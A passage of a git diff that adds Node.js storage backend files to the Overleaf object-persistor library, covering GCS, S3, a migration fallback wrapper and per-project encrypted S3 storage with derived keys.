) + if (error instanceof NotFoundError) { + return + } + throw error + } + } while (query) + } + + async directorySize(bucketName, key) { + let files + const prefix = ensurePrefixIsDirectory(key) + + try { + const [response] = await this.storage + .bucket(bucketName) + .getFiles({ prefix }) + files = response + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to list objects in GCS', + { bucketName, key }, + ReadError + ) + } + + return files.reduce( + (acc, file) => parseInt(file.metadata.size, 10) + acc, + 0 + ) + } + + async checkIfObjectExists(bucketName, key) { + try { + const [response] = await this.storage + .bucket(bucketName) + .file(key) + .exists() + return response + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error checking if file exists in GCS', + { bucketName, key }, + ReadError + ) + } + } + + async copyObject(bucketName, sourceKey, destKey) { + try { + const src = this.storage.bucket(bucketName).file(sourceKey) + const dest = this.storage.bucket(bucketName).file(destKey) + await src.copy(dest) + } catch (err) { + // fake-gcs-server has a bug that returns an invalid response when the file does not exist + if (err.message === 'Cannot parse response as JSON: not found\n') { + err.code = 404 + } + throw PersistorHelper.wrapError( + err, + 'failed to copy file in GCS', + { bucketName, sourceKey, destKey }, + WriteError + ) + } + } +} + +function ensurePrefixIsDirectory(key) { + return key === '' || key.endsWith('/') ? key : `${key}/` +} diff --git a/libraries/object-persistor/src/MigrationPersistor.js b/libraries/object-persistor/src/MigrationPersistor.js new file mode 100644 index 0000000..0cb665f --- /dev/null +++ b/libraries/object-persistor/src/MigrationPersistor.js @@ -0,0 +1,267 @@ +const AbstractPersistor = require('./AbstractPersistor') +const Logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Stream = require('node:stream') +const { pipeline } = require('node:stream/promises') +const { NotFoundError, WriteError } = require('./Errors') + +// Persistor that wraps two other persistors. Talks to the 'primary' by default, +// but will fall back to an older persistor in the case of a not-found error. +// If `Settings.fallback.copyOnMiss` is set, this will copy files from the fallback +// to the primary, in the event that they are missing. +// +// It is unlikely that the bucket/location name will be the same on the fallback +// as the primary. The bucket names should be overridden in `Settings.fallback.buckets` +// e.g. +// Settings.fallback.buckets = { +// myBucketOnS3: 'myBucketOnGCS' +// } + +module.exports = class MigrationPersistor extends AbstractPersistor { + /** + * @param {AbstractPersistor} primaryPersistor + * @param {AbstractPersistor} fallbackPersistor + * @param settings + */ + constructor(primaryPersistor, fallbackPersistor, settings) { + super() + + /** + * @type {AbstractPersistor} + */ + this.primaryPersistor = primaryPersistor + /** + * @type {AbstractPersistor} + */ + this.fallbackPersistor = fallbackPersistor + this.settings = settings + } + + async sendFile(...args) { + return await this.primaryPersistor.sendFile(...args) + } + + async sendStream(...args) { + return await this.primaryPersistor.sendStream(...args) + } + + async getRedirectUrl(...args) { + return await this.primaryPersistor.getRedirectUrl(...args) + } + + async getObjectMd5Hash(...args) { + return await this._runWithFallback('getObjectMd5Hash', ...args) + } + + async checkIfObjectExists(...args) { + return await this._runWithFallback('checkIfObjectExists', ...args) + } + + async getObjectSize(...args) { + return await this._runWithFallback('getObjectSize', ...args) + } + + async directorySize(...args) { + return await this._runWithFallback('directorySize', ...args) + } + + async deleteObject(...args) { + return await this._runOnBoth('deleteObject', ...args) + } + + async deleteDirectory(...args) { + return await this._runOnBoth('deleteDirectory', ...args) + } + + async getObjectStream(bucket, key, opts = {}) { + const shouldCopy = this.settings.copyOnMiss && !opts.start && !opts.end + + try { + return await this.primaryPersistor.getObjectStream(bucket, key, opts) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + key, + opts + ) + // tee the stream to the client, and as a copy to the primary (if necessary) + // start listening on both straight away so that we don't consume bytes + // in one place before the other + const returnStream = new Stream.PassThrough() + pipeline(fallbackStream, returnStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + if (shouldCopy) { + const copyStream = new Stream.PassThrough() + pipeline(fallbackStream, copyStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + this._copyStreamFromFallbackAndVerify( + copyStream, + fallbackBucket, + bucket, + key, + key + ).catch(error => { + Logger.warn({ error }, 'failed to copy file from fallback') + }) + } + return returnStream + } + throw err + } + } + + async copyObject(bucket, sourceKey, destKey) { + try { + return await this.primaryPersistor.copyObject(bucket, sourceKey, destKey) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + sourceKey, + {} + ) + + const copyStream = new Stream.PassThrough() + pipeline(fallbackStream, copyStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + if (this.settings.copyOnMiss) { + const missStream = new Stream.PassThrough() + pipeline(fallbackStream, missStream).catch(error => { + Logger.warn({ error }, 'failed to copy object from fallback') + }) + + // copy from sourceKey -> sourceKey + this._copyStreamFromFallbackAndVerify( + missStream, + fallbackBucket, + bucket, + sourceKey, + sourceKey + ).catch(() => { + // swallow errors, as this runs in the background and will log a warning + }) + } + // copy from sourceKey -> destKey + return await this._copyStreamFromFallbackAndVerify( + copyStream, + fallbackBucket, + bucket, + sourceKey, + destKey + ) + } + throw err + } + } + + async _copyStreamFromFallbackAndVerify( + stream, + sourceBucket, + destBucket, + sourceKey, + destKey + ) { + try { + let sourceMd5 + try { + sourceMd5 = await this.fallbackPersistor.getObjectMd5Hash( + sourceBucket, + sourceKey + ) + } catch (err) { + Logger.warn(err, 'error getting md5 hash from fallback persistor') + } + + await this.primaryPersistor.sendStream(destBucket, destKey, stream, { + sourceMd5, + }) + } catch (err) { + const error = new WriteError( + 'unable to copy file to destination persistor', + { + sourceBucket, + destBucket, + sourceKey, + destKey, + }, + err + ) + Metrics.inc('fallback.copy.failure') + + try { + await this.primaryPersistor.deleteObject(destBucket, destKey) + } catch (err) { + error.info.cleanupError = new WriteError( + 'unable to clean up destination copy artifact', + { + destBucket, + destKey, + }, + err + ) + } + throw error + } + } + + _getFallbackBucket(bucket) { + return (this.settings.buckets && this.settings.buckets[bucket]) || bucket + } + + async _runOnBoth(methodName, bucket, ...moreArgs) { + const fallbackBucket = this._getFallbackBucket(bucket) + + await Promise.all([ + this.primaryPersistor[methodName](bucket, ...moreArgs), + this.fallbackPersistor[methodName](fallbackBucket, ...moreArgs), + ]) + } + + /** + * @param {keyof AbstractPersistor} methodName + * @param bucket + * @param key + * @param moreArgs + */ + async _runWithFallback(methodName, bucket, key, ...moreArgs) { + try { + return await this.primaryPersistor[methodName](bucket, key, ...moreArgs) + } catch (err) { + if (err instanceof NotFoundError) { + const fallbackBucket = this._getFallbackBucket(bucket) + if (this.settings.copyOnMiss) { + const fallbackStream = await this.fallbackPersistor.getObjectStream( + fallbackBucket, + key, + {} + ) + // run in background + this._copyStreamFromFallbackAndVerify( + fallbackStream, + fallbackBucket, + bucket, + key, + key + ).catch(err => { + Logger.warn({ err }, 'failed to copy file from fallback') + }) + } + return await this.fallbackPersistor[methodName]( + fallbackBucket, + key, + ...moreArgs + ) + } + throw err + } + } +} diff --git a/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js b/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js new file mode 100644 index 0000000..7bd4bb9 --- /dev/null +++ b/libraries/object-persistor/src/PerProjectEncryptedS3Persistor.js @@ -0,0 +1,469 @@ +// @ts-check +const Crypto = require('node:crypto') +const Stream = require('node:stream') +const fs = require('node:fs') +const { promisify } = require('node:util') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { S3Persistor, SSECOptions } = require('./S3Persistor.js') +const { + AlreadyWrittenError, + NoKEKMatchedError, + NotFoundError, + NotImplementedError, + ReadError, +} = require('./Errors') +const logger = require('@overleaf/logger') +const Path = require('node:path') + +const generateKey = promisify(Crypto.generateKey) +const hkdf = promisify(Crypto.hkdf) + +const AES256_KEY_LENGTH = 32 + +/** + * @typedef {import('aws-sdk').AWSError} AWSError + */ + +/** + * @typedef {Object} Settings + * @property {boolean} automaticallyRotateDEKEncryption + * @property {string} dataEncryptionKeyBucketName + * @property {boolean} ignoreErrorsFromDEKReEncryption + * @property {(bucketName: string, path: string) => string} pathToProjectFolder + * @property {() => Promise>} getRootKeyEncryptionKeys + */ + +/** + * Helper function to make TS happy when accessing error properties + * AWSError is not an actual class, so we cannot use instanceof. + * @param {any} err + * @return {err is AWSError} + */ +function isAWSError(err) { + return !!err +} + +/** + * @param {any} err + * @return {boolean} + */ +function isForbiddenError(err) { + if (!err || !(err instanceof ReadError || err instanceof NotFoundError)) { + return false + } + const cause = err.cause + if (!isAWSError(cause)) return false + return cause.statusCode === 403 +} + +class RootKeyEncryptionKey { + /** @type {Buffer} */ + #keyEncryptionKey + /** @type {Buffer} */ + #salt + + /** + * @param {Buffer} keyEncryptionKey + * @param {Buffer} salt + */ + constructor(keyEncryptionKey, salt) { + if (keyEncryptionKey.byteLength !== AES256_KEY_LENGTH) { + throw new Error(`kek is not ${AES256_KEY_LENGTH} bytes long`) + } + this.#keyEncryptionKey = keyEncryptionKey + this.#salt = salt + } + + /** + * @param {string} prefix + * @return {Promise} + */ + async forProject(prefix) { + return new SSECOptions( + Buffer.from( + await hkdf( + 'sha256', + this.#keyEncryptionKey, + this.#salt, + prefix, + AES256_KEY_LENGTH + ) + ) + ) + } +} + +class PerProjectEncryptedS3Persistor extends S3Persistor { + /** @type {Settings} */ + #settings + /** @type {Promise>} */ + #availableKeyEncryptionKeysPromise + + /** + * @param {Settings} settings + */ + constructor(settings) { + if (!settings.dataEncryptionKeyBucketName) { + throw new Error('settings.dataEncryptionKeyBucketName is missing') + } + super(settings) + this.#settings = settings + this.#availableKeyEncryptionKeysPromise = settings + .getRootKeyEncryptionKeys() + .then(rootKEKs => { + if (rootKEKs.length === 0) throw new Error('no root kek provided') + return rootKEKs + }) + } + + async ensureKeyEncryptionKeysLoaded() { + await this.#availableKeyEncryptionKeysPromise + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {{dekPath: string, projectFolder: string}} + */ + #buildProjectPaths(bucketName, path) { + const projectFolder = this.#settings.pathToProjectFolder(bucketName, path) + const dekPath = Path.join(projectFolder, 'dek') + return { projectFolder, dekPath } + } + + /** + * @param {string} projectFolder + * @return {Promise} + */ + async #getCurrentKeyEncryptionKey(projectFolder) { + const [currentRootKEK] = await this.#availableKeyEncryptionKeysPromise + return await currentRootKEK.forProject(projectFolder) + } + + /** + * @param {string} bucketName + * @param {string} path + */ + async getDataEncryptionKeySize(bucketName, path) { + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + for (const rootKEK of await this.#availableKeyEncryptionKeysPromise) { + const ssecOptions = await rootKEK.forProject(projectFolder) + try { + return await super.getObjectSize( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + { ssecOptions } + ) + } catch (err) { + if (isForbiddenError(err)) continue + throw err + } + } + throw new NoKEKMatchedError('no kek matched') + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async forProject(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#getDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async forProjectRO(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#getExistingDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async generateDataEncryptionKey(bucketName, path) { + return new CachedPerProjectEncryptedS3Persistor( + this, + await this.#generateDataEncryptionKeyOptions(bucketName, path) + ) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #generateDataEncryptionKeyOptions(bucketName, path) { + const dataEncryptionKey = ( + await generateKey('aes', { length: 256 }) + ).export() + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + await super.sendStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + Stream.Readable.from([dataEncryptionKey]), + { + // Do not overwrite any objects if already created + ifNoneMatch: '*', + ssecOptions: await this.#getCurrentKeyEncryptionKey(projectFolder), + contentLength: 32, + } + ) + return new SSECOptions(dataEncryptionKey) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #getExistingDataEncryptionKeyOptions(bucketName, path) { + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + let res + let kekIndex = 0 + for (const rootKEK of await this.#availableKeyEncryptionKeysPromise) { + const ssecOptions = await rootKEK.forProject(projectFolder) + try { + res = await super.getObjectStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + { ssecOptions } + ) + break + } catch (err) { + if (isForbiddenError(err)) { + kekIndex++ + continue + } + throw err + } + } + if (!res) throw new NoKEKMatchedError('no kek matched') + const buf = new WritableBuffer() + await Stream.promises.pipeline(res, buf) + + if (kekIndex !== 0 && this.#settings.automaticallyRotateDEKEncryption) { + const ssecOptions = await this.#getCurrentKeyEncryptionKey(projectFolder) + try { + await super.sendStream( + this.#settings.dataEncryptionKeyBucketName, + dekPath, + Stream.Readable.from([buf.getContents()]), + { ssecOptions } + ) + } catch (err) { + if (this.#settings.ignoreErrorsFromDEKReEncryption) { + logger.warn({ err, dekPath }, 'failed to persist re-encrypted DEK') + } else { + throw err + } + } + } + + return new SSECOptions(buf.getContents()) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async #getDataEncryptionKeyOptions(bucketName, path) { + try { + return await this.#getExistingDataEncryptionKeyOptions(bucketName, path) + } catch (err) { + if (err instanceof NotFoundError) { + try { + return await this.#generateDataEncryptionKeyOptions(bucketName, path) + } catch (err2) { + if (err2 instanceof AlreadyWrittenError) { + // Concurrent initial write + return await this.#getExistingDataEncryptionKeyOptions( + bucketName, + path + ) + } + throw err2 + } + } + throw err + } + } + + async sendStream(bucketName, path, sourceStream, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getDataEncryptionKeyOptions(bucketName, path)) + return await super.sendStream(bucketName, path, sourceStream, { + ...opts, + ssecOptions, + }) + } + + async getObjectStream(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await super.getObjectStream(bucketName, path, { + ...opts, + ssecOptions, + }) + } + + async getObjectSize(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await super.getObjectSize(bucketName, path, { ...opts, ssecOptions }) + } + + async getObjectStorageClass(bucketName, path, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, path)) + return await super.getObjectStorageClass(bucketName, path, { + ...opts, + ssecOptions, + }) + } + + async directorySize(bucketName, path, continuationToken) { + // Note: Listing a bucket does not require SSE-C credentials. + return await super.directorySize(bucketName, path, continuationToken) + } + + async deleteDirectory(bucketName, path, continuationToken) { + // Let [Settings.pathToProjectFolder] validate the project path before deleting things. + const { projectFolder, dekPath } = this.#buildProjectPaths(bucketName, path) + // Note: Listing/Deleting a prefix does not require SSE-C credentials. + await super.deleteDirectory(bucketName, path, continuationToken) + if (projectFolder === path) { + await super.deleteObject( + this.#settings.dataEncryptionKeyBucketName, + dekPath + ) + } + } + + async getObjectMd5Hash(bucketName, path, opts = {}) { + // The ETag in object metadata is not the MD5 content hash, skip the HEAD request. + opts = { ...opts, etagIsNotMD5: true } + return await super.getObjectMd5Hash(bucketName, path, opts) + } + + async copyObject(bucketName, sourcePath, destinationPath, opts = {}) { + const ssecOptions = + opts.ssecOptions || + (await this.#getDataEncryptionKeyOptions(bucketName, destinationPath)) + const ssecSrcOptions = + opts.ssecSrcOptions || + (await this.#getExistingDataEncryptionKeyOptions(bucketName, sourcePath)) + return await super.copyObject(bucketName, sourcePath, destinationPath, { + ...opts, + ssecOptions, + ssecSrcOptions, + }) + } + + /** + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async getRedirectUrl(bucketName, path) { + throw new NotImplementedError('signed links are not supported with SSE-C') + } +} + +/** + * Helper class for batch updates to avoid repeated fetching of the project path. + * + * A general "cache" for project keys is another alternative. For now, use a helper class. + */ +class CachedPerProjectEncryptedS3Persistor { + /** @type SSECOptions */ + #projectKeyOptions + /** @type PerProjectEncryptedS3Persistor */ + #parent + + /** + * @param {PerProjectEncryptedS3Persistor} parent + * @param {SSECOptions} projectKeyOptions + */ + constructor(parent, projectKeyOptions) { + this.#parent = parent + this.#projectKeyOptions = projectKeyOptions + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {string} fsPath + */ + async sendFile(bucketName, path, fsPath) { + return await this.sendStream(bucketName, path, fs.createReadStream(fsPath)) + } + + /** + * + * @param {string} bucketName + * @param {string} path + * @return {Promise} + */ + async getObjectSize(bucketName, path) { + return await this.#parent.getObjectSize(bucketName, path) + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {NodeJS.ReadableStream} sourceStream + * @param {Object} opts + * @param {string} [opts.contentType] + * @param {string} [opts.contentEncoding] + * @param {number} [opts.contentLength] + * @param {'*'} [opts.ifNoneMatch] + * @param {SSECOptions} [opts.ssecOptions] + * @param {string} [opts.sourceMd5] + * @return {Promise} + */ + async sendStream(bucketName, path, sourceStream, opts = {}) { + return await this.#parent.sendStream(bucketName, path, sourceStream, { + ...opts, + ssecOptions: this.#projectKeyOptions, + }) + } + + /** + * @param {string} bucketName + * @param {string} path + * @param {Object} opts + * @param {number} [opts.start] + * @param {number} [opts.end] + * @param {boolean} [opts.autoGunzip] + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectStream(bucketName, path, opts = {}) { + return await this.#parent.getObjectStream(bucketName, path, { + ...opts, + ssecOptions: this.#projectKeyOptions, + }) + } +} + +module.exports = { + PerProjectEncryptedS3Persistor, + CachedPerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} diff --git a/libraries/object-persistor/src/PersistorFactory.js b/libraries/object-persistor/src/PersistorFactory.js new file mode 100644 index 0000000..3f11507 --- /dev/null +++ b/libraries/object-persistor/src/PersistorFactory.js @@ -0,0 +1,51 @@ +const Logger = require('@overleaf/logger') +const { SettingsError } = require('./Errors') +const GcsPersistor = require('./GcsPersistor') +const { S3Persistor } = require('./S3Persistor') +const FSPersistor = require('./FSPersistor') +const MigrationPersistor = require('./MigrationPersistor') +const { + PerProjectEncryptedS3Persistor, +} = require('./PerProjectEncryptedS3Persistor') + +function getPersistor(backend, settings) { + switch (backend) { + case 'aws-sdk': + case 's3': + return new S3Persistor(settings.s3) + case 's3SSEC': + return new PerProjectEncryptedS3Persistor(settings.s3SSEC) + case 'fs': + return new FSPersistor({ + useSubdirectories: settings.useSubdirectories, + paths: settings.paths, + }) + case 'gcs': + return new GcsPersistor(settings.gcs) + default: + throw new SettingsError('unknown backend', { backend }) + } +} + +module.exports = function create(settings) { + Logger.info( + { + backend: settings.backend, + fallback: settings.fallback && settings.fallback.backend, + }, + 'Loading backend' + ) + if (!settings.backend) { + throw new SettingsError('no backend specified - config incomplete') + } + + let persistor = getPersistor(settings.backend, settings) + + if (settings.fallback && settings.fallback.backend) { + const primary = persistor + const fallback = getPersistor(settings.fallback.backend, settings) + persistor = new MigrationPersistor(primary, fallback, settings.fallback) + } + + return persistor +} diff --git a/libraries/object-persistor/src/PersistorHelper.js b/libraries/object-persistor/src/PersistorHelper.js new file mode 100644 index 0000000..ad0a705 --- /dev/null +++ b/libraries/object-persistor/src/PersistorHelper.js @@ -0,0 +1,173 @@ +const Crypto = require('node:crypto') +const Stream = require('node:stream') +const { pipeline } = require('node:stream/promises') +const Logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const { WriteError, NotFoundError, AlreadyWrittenError } = require('./Errors') + +const _128KiB = 128 * 1024 +const TIMING_BUCKETS = [ + 0, 1, 2, 5, 10, 20, 50, 100, 200, 500, 1000, 2000, 5000, 10000, 20000, 50000, +] +const SIZE_BUCKETS = [ + 0, + 1_000, + 10_000, + 100_000, + _128KiB, + 1_000_000, + 10_000_000, + 50_000_000, + 100_000_000, +] + +/** + * Observes data that passes through and optionally computes hash for content. + */ +class ObserverStream extends Stream.Transform { + /** + * @param {Object} opts + * @param {string} opts.metric prefix for metrics + * @param {string} opts.bucket name of source/target bucket + * @param {string} [opts.hash] optional hash algorithm, e.g. 'md5' + */ + constructor(opts) { + super({ autoDestroy: true }) + const { metric, bucket, hash = '' } = opts + + this.bytes = 0 + this.start = performance.now() + + if (hash) { + this.hash = Crypto.createHash(hash) + } + + const onEnd = status => { + const size = this.bytes < _128KiB ? 'lt-128KiB' : 'gte-128KiB' + const labels = { size, bucket, status } + // Keep this counter metric to allow rendering long-term charts. + Metrics.count(metric, this.bytes, 1, labels) + Metrics.inc(`${metric}.hit`, 1, labels) + + if (status === 'error') return + // The below metrics are only relevant for successfully fetched objects. + + Metrics.histogram(`${metric}.size`, this.bytes, SIZE_BUCKETS, { + status, + bucket, + }) + if (this.firstByteAfterMs) { + Metrics.histogram( + `${metric}.latency.first-byte`, + this.firstByteAfterMs, + TIMING_BUCKETS, + labels + ) + } + Metrics.histogram( + `${metric}.latency`, + this.#getMsSinceStart(), + TIMING_BUCKETS, + labels + ) + } + this.once('error', () => onEnd('error')) + this.once('end', () => onEnd('success')) + } + + #getMsSinceStart() { + return performance.now() - this.start + } + + _transform(chunk, encoding, done) { + if (this.bytes === 0) { + this.firstByteAfterMs = this.#getMsSinceStart() + } + if (this.hash) { + this.hash.update(chunk) + } + this.bytes += chunk.length + this.push(chunk) + done() + } + + getHash() { + return this.hash && this.hash.digest('hex') + } +} + +module.exports = { + ObserverStream, + calculateStreamMd5, + verifyMd5, + wrapError, + hexToBase64, + base64ToHex, +} + +// returns a promise which resolves with the md5 hash of the stream +// - consumes the stream +async function calculateStreamMd5(stream) { + const hash = Crypto.createHash('md5') + hash.setEncoding('hex') + + await pipeline(stream, hash) + return hash.read() +} + +// verifies the md5 hash of a file against the supplied md5 or the one stored in +// storage if not supplied - deletes the new file if the md5 does not match and +// throws an error +async function verifyMd5(persistor, bucket, key, sourceMd5, destMd5 = null) { + if (!destMd5) { + destMd5 = await persistor.getObjectMd5Hash(bucket, key) + } + + if (sourceMd5 !== destMd5) { + try { + await persistor.deleteObject(bucket, key) + } catch (err) { + Logger.warn(err, 'error deleting file for invalid upload') + } + + throw new WriteError('source and destination hashes do not match', { + sourceMd5, + destMd5, + bucket, + key, + }) + } +} + +function wrapError(error, message, params, ErrorType) { + params = { + ...params, + cause: error, + } + if ( + error instanceof NotFoundError || + ['NoSuchKey', 'NotFound', 404, 'AccessDenied', 'ENOENT'].includes( + error.code + ) || + (error.response && error.response.statusCode === 404) + ) { + return new NotFoundError('no such file', params, error) + } else if ( + params.ifNoneMatch === '*' && + (error.code === 'PreconditionFailed' || + error.response?.statusCode === 412 || + error instanceof AlreadyWrittenError) + ) { + return new AlreadyWrittenError(message, params, error) + } else { + return new ErrorType(message, params, error) + } +} + +function base64ToHex(base64) { + return Buffer.from(base64, 'base64').toString('hex') +} + +function hexToBase64(hex) { + return Buffer.from(hex, 'hex').toString('base64') +} diff --git a/libraries/object-persistor/src/S3Persistor.js b/libraries/object-persistor/src/S3Persistor.js new file mode 100644 index 0000000..2835a27 --- /dev/null +++ b/libraries/object-persistor/src/S3Persistor.js @@ -0,0 +1,617 @@ +// @ts-check +const http = require('node:http') +const https = require('node:https') +if (http.globalAgent.maxSockets < 300) { + http.globalAgent.maxSockets = 300 +} +if (https.globalAgent.maxSockets < 300) { + https.globalAgent.maxSockets = 300 +} + +const Crypto = require('node:crypto') +const Metrics = require('@overleaf/metrics') +const AbstractPersistor = require('./AbstractPersistor') +const PersistorHelper = require('./PersistorHelper') + +const { pipeline, PassThrough } = require('node:stream') +const fs = require('node:fs') +const S3 = require('aws-sdk/clients/s3') +const { URL } = require('node:url') +const { WriteError, ReadError, NotFoundError } = require('./Errors') +const zlib = require('node:zlib') + +/** + * Wrapper with private fields to avoid revealing them on console, JSON.stringify or similar. + */ +class SSECOptions { + #keyAsBuffer + #keyMD5 + + /** + * @param {Buffer} keyAsBuffer + */ + constructor(keyAsBuffer) { + this.#keyAsBuffer = keyAsBuffer + this.#keyMD5 = Crypto.createHash('md5').update(keyAsBuffer).digest('base64') + } + + getPutOptions() { + return { + SSECustomerKey: this.#keyAsBuffer, + SSECustomerKeyMD5: this.#keyMD5, + SSECustomerAlgorithm: 'AES256', + } + } + + getGetOptions() { + return { + SSECustomerKey: this.#keyAsBuffer, + SSECustomerKeyMD5: this.#keyMD5, + SSECustomerAlgorithm: 'AES256', + } + } + + getCopyOptions() { + return { + CopySourceSSECustomerKey: this.#keyAsBuffer, + CopySourceSSECustomerKeyMD5: this.#keyMD5, + CopySourceSSECustomerAlgorithm: 'AES256', + } + } +} + +class S3Persistor extends AbstractPersistor { + /** @type {Map} */ + #clients = new Map() + + constructor(settings = {}) { + super() + + settings.storageClass = settings.storageClass || {} + this.settings = settings + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} fsPath + * @return {Promise} + */ + async sendFile(bucketName, key, fsPath) { + await this.sendStream(bucketName, key, fs.createReadStream(fsPath)) + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {NodeJS.ReadableStream} readStream + * @param {Object} opts + * @param {string} [opts.contentType] + * @param {string} [opts.contentEncoding] + * @param {number} [opts.contentLength] + * @param {'*'} [opts.ifNoneMatch] + * @param {SSECOptions} [opts.ssecOptions] + * @param {string} [opts.sourceMd5] + * @return {Promise} + */ + async sendStream(bucketName, key, readStream, opts = {}) { + try { + const observeOptions = { + metric: 's3.egress', // egress from us to S3 + bucket: bucketName, + } + + const observer = new PersistorHelper.ObserverStream(observeOptions) + // observer will catch errors, clean up and log a warning + pipeline(readStream, observer, () => {}) + + /** @type {S3.PutObjectRequest} */ + const uploadOptions = { + Bucket: bucketName, + Key: key, + Body: observer, + } + + if (this.settings.storageClass[bucketName]) { + uploadOptions.StorageClass = this.settings.storageClass[bucketName] + } + + if (opts.contentType) { + uploadOptions.ContentType = opts.contentType + } + if (opts.contentEncoding) { + uploadOptions.ContentEncoding = opts.contentEncoding + } + if (opts.contentLength) { + uploadOptions.ContentLength = opts.contentLength + } + if (opts.ifNoneMatch === '*') { + uploadOptions.IfNoneMatch = '*' + } + if (opts.ssecOptions) { + Object.assign(uploadOptions, opts.ssecOptions.getPutOptions()) + } + + // if we have an md5 hash, pass this to S3 to verify the upload - otherwise + // we rely on the S3 client's checksum calculation to validate the upload + let computeChecksums = false + if (opts.sourceMd5) { + uploadOptions.ContentMD5 = PersistorHelper.hexToBase64(opts.sourceMd5) + } else { + computeChecksums = true + } + + if (this.settings.disableMultiPartUpload) { + await this._getClientForBucket(bucketName, computeChecksums) + .putObject(uploadOptions) + .promise() + } else { + await this._getClientForBucket(bucketName, computeChecksums) + .upload(uploadOptions, { partSize: this.settings.partSize }) + .promise() + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'upload to S3 failed', + { bucketName, key, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} [opts] + * @param {number} [opts.start] + * @param {number} [opts.end] + * @param {boolean} [opts.autoGunzip] + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectStream(bucketName, key, opts) { + opts = opts || {} + + const params = { + Bucket: bucketName, + Key: key, + } + if (opts.start != null && opts.end != null) { + params.Range = `bytes=${opts.start}-${opts.end}` + } + if (opts.ssecOptions) { + Object.assign(params, opts.ssecOptions.getGetOptions()) + } + const observer = new PersistorHelper.ObserverStream({ + metric: 's3.ingress', // ingress from S3 to us + bucket: bucketName, + }) + + const req = this._getClientForBucket(bucketName).getObject(params) + const stream = req.createReadStream() + + let contentEncoding + try { + await new Promise((resolve, reject) => { + req.on('httpHeaders', (statusCode, headers) => { + switch (statusCode) { + case 200: // full response + case 206: // partial response + contentEncoding = headers['content-encoding'] + return resolve(undefined) + case 403: // AccessDenied + return // handled by stream.on('error') handler below + case 404: // NoSuchKey + return reject(new NotFoundError('not found')) + default: + // handled by stream.on('error') handler below + } + }) + // The AWS SDK is forwarding any errors from the request to the stream. + // The AWS SDK is emitting additional errors on the stream ahead of starting to stream. + stream.on('error', reject) + // The AWS SDK is kicking off the request in the next event loop cycle. + }) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error reading file from S3', + { bucketName, key, opts }, + ReadError + ) + } + // Return a PassThrough stream with a minimal interface. It will buffer until the caller starts reading. It will emit errors from the source stream (Stream.pipeline passes errors along). + const pass = new PassThrough() + const transformer = [] + if (contentEncoding === 'gzip' && opts.autoGunzip) { + transformer.push(zlib.createGunzip()) + } + pipeline(stream, observer, ...transformer, pass, err => { + if (err) req.abort() + }) + return pass + } + + /** + * @param {string} bucketName + * @param {string} key + * @return {Promise} + */ + async getRedirectUrl(bucketName, key) { + const expiresSeconds = Math.round(this.settings.signedUrlExpiryInMs / 1000) + try { + return await this._getClientForBucket(bucketName).getSignedUrlPromise( + 'getObject', + { + Bucket: bucketName, + Key: key, + Expires: expiresSeconds, + } + ) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error generating signed url for S3 file', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} [continuationToken] + * @return {Promise} + */ + async deleteDirectory(bucketName, key, continuationToken) { + let response + const options = { Bucket: bucketName, Prefix: key } + if (continuationToken) { + options.ContinuationToken = continuationToken + } + + try { + response = await this._getClientForBucket(bucketName) + .listObjectsV2(options) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to list objects in S3', + { bucketName, key }, + ReadError + ) + } + + const objects = response.Contents?.map(item => ({ Key: 